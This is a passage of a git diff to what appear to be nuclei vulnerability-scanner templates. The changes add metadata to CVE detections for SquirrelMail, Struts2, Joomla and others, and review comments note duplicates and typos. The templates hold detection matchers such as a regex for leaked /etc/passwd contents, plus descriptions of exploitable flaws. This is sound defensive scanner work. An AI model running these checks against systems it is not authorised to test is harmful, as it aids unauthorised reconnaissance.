"https://www.github.com/daffainfo", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "darrenmartyn", + "links": { + "github": "https://www.github.com/darrenmartyn", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "deFr0ggy", + "links": { + "github": "https://www.github.com/deFr0ggy", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ehrishirajsharma", + "links": { + "github": "https://www.github.com/ehrishirajsharma", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ehsahil", + "links": { + "github": "https://www.github.com/ehsahil", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ehsandeep", + "links": { + "github": "https://www.github.com/ehsandeep", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "evanRubinsteinIT", + "links": { + "github": "https://www.github.com/evanRubinsteinIT", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "flag007", + "links": { + "github": "https://www.github.com/flag007", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "forgedhallpass", + "links": { + "github": "https://www.github.com/forgedhallpass", + "twitter": "https://twitter.com/forgedhallpass", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "gabrielbarros39", + "links": { + "github": "https://www.github.com/gabrielbarros39", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "geeknik", + "links": { + "github": "https://www.github.com/geeknik", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "gevakun", + "links": { + "github": "https://www.github.com/gevakun", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + 
{ + "author": "github", + "links": { + "github": "https://www.github.com/github", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "hackerrishad", + "links": { + "github": "https://www.github.com/hackerrishad", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "harsh-bothra", + "links": { + "github": "https://www.github.com/harsh-bothra", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "harshinsecurity", + "links": { + "github": "https://www.github.com/harshinsecurity", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "hetroublemaker", + "links": { + "github": "https://www.github.com/hetroublemaker", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "iDuronto", + "links": { + "github": "https://www.github.com/iDuronto", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "impramodsargar", + "links": { + "github": "https://www.github.com/impramodsargar", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "infosecsanyam261", + "links": { + "github": "https://www.github.com/infosecsanyam261", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ioribrn", + "links": { + "github": "https://www.github.com/ioribrn", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "izn0u", + "links": { + "github": "https://www.github.com/izn0u", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "jeenikaa", + "links": { + "github": "https://www.github.com/jeenikaa", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "jeyaseelan8", + "links": { + "github": "https://www.github.com/jeyaseelan8", + "twitter": "", + "linkedin": "", + "website": "", + 
"email": "" + } + }, + { + "author": "joeldeleep", + "links": { + "github": "https://www.github.com/joeldeleep", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "johnjhacking", + "links": { + "github": "https://www.github.com/johnjhacking", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "juicypotato1", + "links": { + "github": "https://www.github.com/juicypotato1", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "kevin-ntn", + "links": { + "github": "https://www.github.com/kevin-ntn", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "knightm4re", + "links": { + "github": "https://www.github.com/knightm4re", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ks6274", + "links": { + "github": "https://www.github.com/ks6274", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "lethargynavigator", + "links": { + "github": "https://www.github.com/lethargynavigator", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "mahhari", + "links": { + "github": "https://www.github.com/mahhari", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "majidmc2", + "links": { + "github": "https://www.github.com/majidmc2", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "manasjha7", + "links": { + "github": "https://www.github.com/manasjha7", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "martincodes-de", + "links": { + "github": "https://www.github.com/martincodes-de", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "melbadry9", + "links": { + "github": "https://www.github.com/melbadry9", + "twitter": "", + "linkedin": "", + 
"website": "", + "email": "" + } + }, + { + "author": "meme-lord", + "links": { + "github": "https://www.github.com/meme-lord", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "mohammedshine", + "links": { + "github": "https://www.github.com/mohammedshine", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "mr-rizwan-syed", + "links": { + "github": "https://www.github.com/mr-rizwan-syed", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "nahoragg", + "links": { + "github": "https://www.github.com/nahoragg", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "nerrorsec", + "links": { + "github": "https://www.github.com/nerrorsec", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ninj4c0d3r", + "links": { + "github": "https://www.github.com/ninj4c0d3r", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "niudaii", + "links": { + "github": "https://www.github.com/niudaii", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "nxnjz", + "links": { + "github": "https://www.github.com/nxnjz", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "nytr0gen", + "links": { + "github": "https://www.github.com/nytr0gen", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "olacin", + "links": { + "github": "https://www.github.com/olacin", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "omarkurt", + "links": { + "github": "https://www.github.com/omarkurt", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "oppsec", + "links": { + "github": "https://www.github.com/oppsec", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" 
+ } + }, + { + "author": "organiccrap", + "links": { + "github": "https://www.github.com/organiccrap", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ossie-git", + "links": { + "github": "https://www.github.com/ossie-git", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "palaziv", + "links": { + "github": "https://www.github.com/palaziv", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "pdiscoveryio", + "links": { + "github": "https://www.github.com/pdiscoveryio", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "pikpikcu", + "links": { + "github": "https://www.github.com/pikpikcu", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "pudsec", + "links": { + "github": "https://www.github.com/pudsec", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "push4d", + "links": { + "github": "https://www.github.com/push4d", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "pussycat0x", + "links": { + "github": "https://www.github.com/pussycat0x", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "r3dg33k", + "links": { + "github": "https://www.github.com/r3dg33k", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "randomstr1ng", + "links": { + "github": "https://www.github.com/randomstr1ng", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ratnadip1998", + "links": { + "github": "https://www.github.com/ratnadip1998", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ree4pwn", + "links": { + "github": "https://www.github.com/ree4pwn", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + 
"author": "rojan-rijal", + "links": { + "github": "https://www.github.com/rojan-rijal", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "rtcms", + "links": { + "github": "https://www.github.com/rtcms", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "secureITmania", + "links": { + "github": "https://www.github.com/secureITmania", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "shelld3v", + "links": { + "github": "https://www.github.com/shelld3v", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "sillydadddy", + "links": { + "github": "https://www.github.com/sillydadddy", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "skar4444", + "links": { + "github": "https://www.github.com/skar4444", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "swisskyrepo", + "links": { + "github": "https://www.github.com/swisskyrepo", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "team-projectdiscovery", + "links": { + "github": "https://www.github.com/team-projectdiscovery", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "thesubtlety", + "links": { + "github": "https://www.github.com/thesubtlety", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "udit-thakkur", + "links": { + "github": "https://www.github.com/udit-thakkur", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "uhnysh", + "links": { + "github": "https://www.github.com/uhnysh", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "unstabl3", + "links": { + "github": "https://www.github.com/unstabl3", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" 
+ } + }, + { + "author": "v1dhun", + "links": { + "github": "https://www.github.com/v1dhun", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "wisnupramoedya", + "links": { + "github": "https://www.github.com/wisnupramoedya", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "xElkomy", + "links": { + "github": "https://www.github.com/xElkomy", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "zzeitlin", + "links": { + "github": "https://www.github.com/zzeitlin", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + } +] \ No newline at end of file diff --git a/cves/2000/CVE-2000-0114.yaml b/cves/2000/CVE-2000-0114.yaml index 684b6c1286..0050d0c90c 100644 --- a/cves/2000/CVE-2000-0114.yaml +++ b/cves/2000/CVE-2000-0114.yaml @@ -8,6 +8,9 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2000-0114 - https://www.exploit-db.com/exploits/19897 + classification: + cve-id: CVE-2000-0114 + remediation: Upgrade to the latest version. tags: cve,cve2000,frontpage,microsoft requests: @@ -24,4 +27,6 @@ requests: - type: word part: body words: - - "_vti_bin/shtml.dll" \ No newline at end of file + - "_vti_bin/shtml.dll" + +# Enhanced by mp on 2022/01/27 diff --git a/cves/2001/CVE-2001-1473.yaml b/cves/2001/CVE-2001-1473.yaml index 476fa47cd5..b52317707c 100644 --- a/cves/2001/CVE-2001-1473.yaml +++ b/cves/2001/CVE-2001-1473.yaml 
@@ -4,22 +4,26 @@ info: name: Deprecated SSHv1 Protocol Detection author: iamthefrogy severity: high - tags: network,ssh,openssh,cves,cves2001 description: SSHv1 is deprecated and has known cryptographic issues. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 classification: - cvss-score: 7.4 cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 7.4 cve-id: CVE-2001-1473 cwe-id: CWE-310 + remediation: Upgrade to SSH 2.4 or later. + tags: cve,cve2001,network,ssh,openssh network: - host: - "{{Hostname}}" - - "{{Hostname}}:22" + - "{{Host}}:22" + matchers: - type: word words: - "SSH-1" + +# Enhanced by Chris on 2022/01/21 diff --git a/cves/2002/CVE-2002-1131.yaml b/cves/2002/CVE-2002-1131.yaml index d289fe5b5f..4b84c6d958 100644 --- a/cves/2002/CVE-2002-1131.yaml +++ b/cves/2002/CVE-2002-1131.yaml @@ -5,7 +5,13 @@ info: author: dhiyaneshDk severity: medium description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - reference: https://www.exploit-db.com/exploits/21811 + reference: + - https://www.exploit-db.com/exploits/21811 + - http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html + - http://www.securityfocus.com/bid/5763 + - http://www.iss.net/security_center/static/10145.php + classification: + cve-id: CVE-2002-1131 tags: xss,squirrelmail,cve,cve2002 requests: diff --git a/cves/2004/CVE-2004-0519.yaml b/cves/2004/CVE-2004-0519.yaml index 86da54f93e..cd4347e716 100644 --- a/cves/2004/CVE-2004-0519.yaml +++ b/cves/2004/CVE-2004-0519.yaml 
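Review bot: `remediation: Upgrade to SSH 2.4 or later.` is ambiguous — the SSH protocol has versions 1 and 2, so `2.4` reads like a product version without naming the product. Since the finding is that protocol 1 is offered at all, the actionable advice is to disable it, e.g. `remediation: Disable SSH protocol version 1 (set Protocol 2 in sshd_config) or upgrade to a release that no longer offers it.`; confirm the wording against the CERT reference. The `host` change from `{{Hostname}}:22` to `{{Host}}:22` looks right, as it avoids a doubled port when the input already carries one, but it also means a target given on another port is probed on 22 as well — worth a comment if that is intended.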
@@ -4,8 +4,15 @@ info: name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting author: dhiyaneshDk severity: medium - description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php." - reference: https://www.exploit-db.com/exploits/24068 + description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php. + reference: + - https://www.exploit-db.com/exploits/24068 + - ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc + - http://security.gentoo.org/glsa/glsa-200405-16.xml + - http://www.securityfocus.com/archive/1/361857 + remediation: Upgrade to the latest version. + classification: + cve-id: CVE-2004-0519 tags: xss,squirrelmail,cve2004,cve requests: @@ -28,3 +35,5 @@ requests: part: header words: - "text/html" + +# Enhanced by mp on 2022/01/27 diff --git a/cves/2005/CVE-2005-2428.yaml b/cves/2005/CVE-2005-2428.yaml index 061af2a832..9f7d76a8e0 100644 --- a/cves/2005/CVE-2005-2428.yaml +++ b/cves/2005/CVE-2005-2428.yaml 
@@ -1,13 +1,21 @@ id: CVE-2005-2428 + info: - name: CVE-2005-2428 + name: Lotus Domino R5 and R6 WebMail - Information Disclosure author: CasperGN severity: medium - tags: cve,cve2005 - description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696. + description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). reference: - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf - https://www.exploit-db.com/exploits/39495 + - https://nvd.nist.gov/vuln/detail/CVE-2005-2428 + remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2005-2428 + cwe-id: CWE-200 + tags: cve,cve2005,domino requests: - method: GET @@ -21,5 +29,7 @@ requests: - type: regex name: domino-username regex: - - '(Horde :: User Administration" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/18 
diff --git a/cves/2005/CVE-2005-4385.yaml b/cves/2005/CVE-2005-4385.yaml index bf2da66428..a1b518dfcd 100644 --- a/cves/2005/CVE-2005-4385.yaml +++ b/cves/2005/CVE-2005-4385.yaml @@ -2,12 +2,16 @@ id: CVE-2005-4385 info: name: Cofax <= 2.0RC3 XSS + author: geeknik + severity: medium description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. reference: - http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html - https://nvd.nist.gov/vuln/detail/CVE-2005-4385 - author: geeknik - severity: medium + - http://www.securityfocus.com/bid/15940 + - http://www.osvdb.org/21850 + classification: + cve-id: CVE-2005-4385 tags: cofax,xss,cve,cve2005 requests: diff --git a/cves/2006/CVE-2006-1681.yaml b/cves/2006/CVE-2006-1681.yaml index 31764515a9..56aacf1327 100644 --- a/cves/2006/CVE-2006-1681.yaml +++ b/cves/2006/CVE-2006-1681.yaml @@ -2,12 +2,16 @@ id: CVE-2006-1681 info: name: Cherokee HTTPD <=0.5 XSS + author: geeknik + severity: medium description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. reference: - https://www.securityfocus.com/bid/17408 - https://nvd.nist.gov/vuln/detail/CVE-2006-1681 - author: geeknik - severity: medium + - http://secunia.com/advisories/19587 + - http://www.securityfocus.com/bid/17408 + classification: + cve-id: CVE-2006-1681 tags: cherokee,httpd,xss,cve,cve2006 requests: diff --git a/cves/2006/CVE-2006-2842.yaml b/cves/2006/CVE-2006-2842.yaml index 243a171e68..2c5e750191 100644 --- a/cves/2006/CVE-2006-2842.yaml +++ b/cves/2006/CVE-2006-2842.yaml 
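Review bot: The CVE-2006-1681 reference list now holds the same advisory twice, the existing `- https://www.securityfocus.com/bid/17408` and the added `- http://www.securityfocus.com/bid/17408`; drop the added http line. CVE-2009-4223 in this same commit has the identical duplication, where `- http://www.exploit-db.com/exploits/10216` is added next to the existing https link, and should get the same cleanup.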
@@ -4,8 +4,14 @@ info: name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion author: dhiyaneshDk severity: high - description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable." - reference: https://www.exploit-db.com/exploits/27948 + description: 'PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable.' 
+ reference: + - https://www.exploit-db.com/exploits/27948 + - http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE + - http://www.squirrelmail.org/security/issue/2006-06-01 + - http://secunia.com/advisories/20406 + classification: + cve-id: CVE-2006-2842 tags: cve2006,lfi,squirrelmail,cve requests: diff --git a/cves/2007/CVE-2007-0885.yaml b/cves/2007/CVE-2007-0885.yaml index b237557509..834637471b 100644 --- a/cves/2007/CVE-2007-0885.yaml +++ b/cves/2007/CVE-2007-0885.yaml @@ -2,10 +2,16 @@ id: CVE-2007-0885 info: name: Rainbow.Zen Jira XSS - description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter. - reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded author: geeknik severity: medium + description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter. + reference: + - https://www.securityfocus.com/archive/1/459590/100/0/threaded + - http://www.securityfocus.com/bid/22503 + - http://osvdb.org/33683 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/32418 + classification: + cve-id: CVE-2007-0885 tags: cve,cve2007,jira,xss requests: diff --git a/cves/2007/CVE-2007-4504.yaml b/cves/2007/CVE-2007-4504.yaml index f9e0afd43d..9463b90ee5 100644 --- a/cves/2007/CVE-2007-4504.yaml +++ b/cves/2007/CVE-2007-4504.yaml 
@@ -1,13 +1,16 @@ id: CVE-2007-4504 info: - name: Joomla! Component RSfiles 1.0.2 - 'path' File Download + name: Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval author: daffainfo severity: high - description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action. + description: An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. reference: - https://www.exploit-db.com/exploits/4307 - https://www.cvedetails.com/cve/CVE-2007-4504 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222 + classification: + cve-id: CVE-2007-4504 tags: cve,cve2007,joomla,lfi requests: @@ -20,7 +23,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml index 1a7b1450ed..7bae9bf531 100644 --- a/cves/2007/CVE-2007-4556.yaml +++ b/cves/2007/CVE-2007-4556.yaml 
@@ -1,11 +1,18 @@ id: CVE-2007-4556 info: - name: Apache Struts2 S2-001 RCE + name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution author: pikpikcu severity: critical - description: Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character. - reference: https://www.guildhab.top/?p=2326 + description: | + Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character. + reference: + - https://www.guildhab.top/?p=2326 + - https://nvd.nist.gov/vuln/detail/CVE-2007-4556 + - https://cwiki.apache.org/confluence/display/WW/S2-001 + - http://forums.opensymphony.com/ann.jspa?annID=54 + classification: + cve-id: CVE-2007-4556 tags: cve,cve2007,apache,rce,struts requests: @@ -22,9 +29,11 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status status: - 200 + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2007/CVE-2007-5728.yaml b/cves/2007/CVE-2007-5728.yaml index 98c2548f6f..332f0e1357 100644 --- a/cves/2007/CVE-2007-5728.yaml +++ b/cves/2007/CVE-2007-5728.yaml 
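Review bot: The rewritten description for CVE-2007-4556 introduces a stray quote in `via for"m input beginning with a "%{" sequence`; it should read `via form input beginning with a "%{" sequence`. Because the text now sits in a `description: |` block scalar, the typo is preserved verbatim and will appear unchanged in nuclei output.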
@@ -5,10 +5,16 @@ info: author: dhiyaneshDK severity: medium description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865. - tags: cve,cve2007,xss,pgadmin - reference: https://www.exploit-db.com/exploits/30090 + reference: + - https://www.exploit-db.com/exploits/30090 + - http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html + - http://www.securityfocus.com/bid/24182 + - http://secunia.com/advisories/25446 + classification: + cve-id: CVE-2007-5728 metadata: - shodan-query: 'http.title:"phpPgAdmin"' + shodan-query: http.title:"phpPgAdmin" + tags: cve,cve2007,xss,pgadmin,phppgadmin requests: - method: GET diff --git a/cves/2008/CVE-2008-2398.yaml b/cves/2008/CVE-2008-2398.yaml index 990afdc4ed..367edc8dbf 100644 --- a/cves/2008/CVE-2008-2398.yaml +++ b/cves/2008/CVE-2008-2398.yaml @@ -5,7 +5,13 @@ info: author: unstabl3 severity: medium description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. - reference: https://exchange.xforce.ibmcloud.com/vulnerabilities/42546 + reference: + - https://exchange.xforce.ibmcloud.com/vulnerabilities/42546 + - http://www.securityfocus.com/bid/29291 + - http://secunia.com/advisories/30333 + - http://securityreason.com/securityalert/3896 + classification: + cve-id: CVE-2008-2398 tags: cve,cve2008,xss requests: @@ -26,4 +32,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/cves/2008/CVE-2008-2650.yaml b/cves/2008/CVE-2008-2650.yaml index 56d8f91191..fd2721a6d5 100644 --- a/cves/2008/CVE-2008-2650.yaml +++ b/cves/2008/CVE-2008-2650.yaml 
@@ -1,12 +1,20 @@ id: CVE-2008-2650 -info: - name: CMSimple 3.1 - Local File Inclusion - author: pussycat0x - severity: high - description: | - Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number. - reference: https://www.exploit-db.com/exploits/5700 - tags: cve,cve2008,lfi + +info: + name: CMSimple 3.1 - Local File Inclusion + author: pussycat0x + severity: high + description: | + Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number. + reference: + - http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17 + - http://www.securityfocus.com/bid/29450 + - http://secunia.com/advisories/30463 + - http://osvdb.org/45881 + classification: + cve-id: CVE-2008-2650 + tags: cve,cve2008,lfi + requests: - raw: - | diff --git a/cves/2008/CVE-2008-4668.yaml b/cves/2008/CVE-2008-4668.yaml index ab38886489..d14e0a3b1e 100644 --- a/cves/2008/CVE-2008-4668.yaml +++ b/cves/2008/CVE-2008-4668.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/6618 - https://www.cvedetails.com/cve/CVE-2008-4668 + - http://www.securityfocus.com/bid/31458 + - http://securityreason.com/securityalert/4464 + classification: + cve-id: CVE-2008-4668 tags: cve,cve2008,joomla,lfi requests: 
@@ -20,7 +24,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2008/CVE-2008-4764.yaml b/cves/2008/CVE-2008-4764.yaml index 309174ce27..0b0db9bff6 100644 --- a/cves/2008/CVE-2008-4764.yaml +++ b/cves/2008/CVE-2008-4764.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/5435 - https://www.cvedetails.com/cve/CVE-2008-4764 + - http://www.securityfocus.com/bid/28764 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/41873 + classification: + cve-id: CVE-2008-4764 tags: cve,cve2008,joomla,lfi requests: @@ -20,7 +24,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2008/CVE-2008-5587.yaml b/cves/2008/CVE-2008-5587.yaml index 6045940b95..6dae0ebe25 100644 --- a/cves/2008/CVE-2008-5587.yaml +++ b/cves/2008/CVE-2008-5587.yaml @@ -4,11 +4,17 @@ info: name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion author: dhiyaneshDK severity: medium - reference: https://www.exploit-db.com/exploits/7363 - tags: cve2008,lfi,phppgadmin + description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/7363 + - 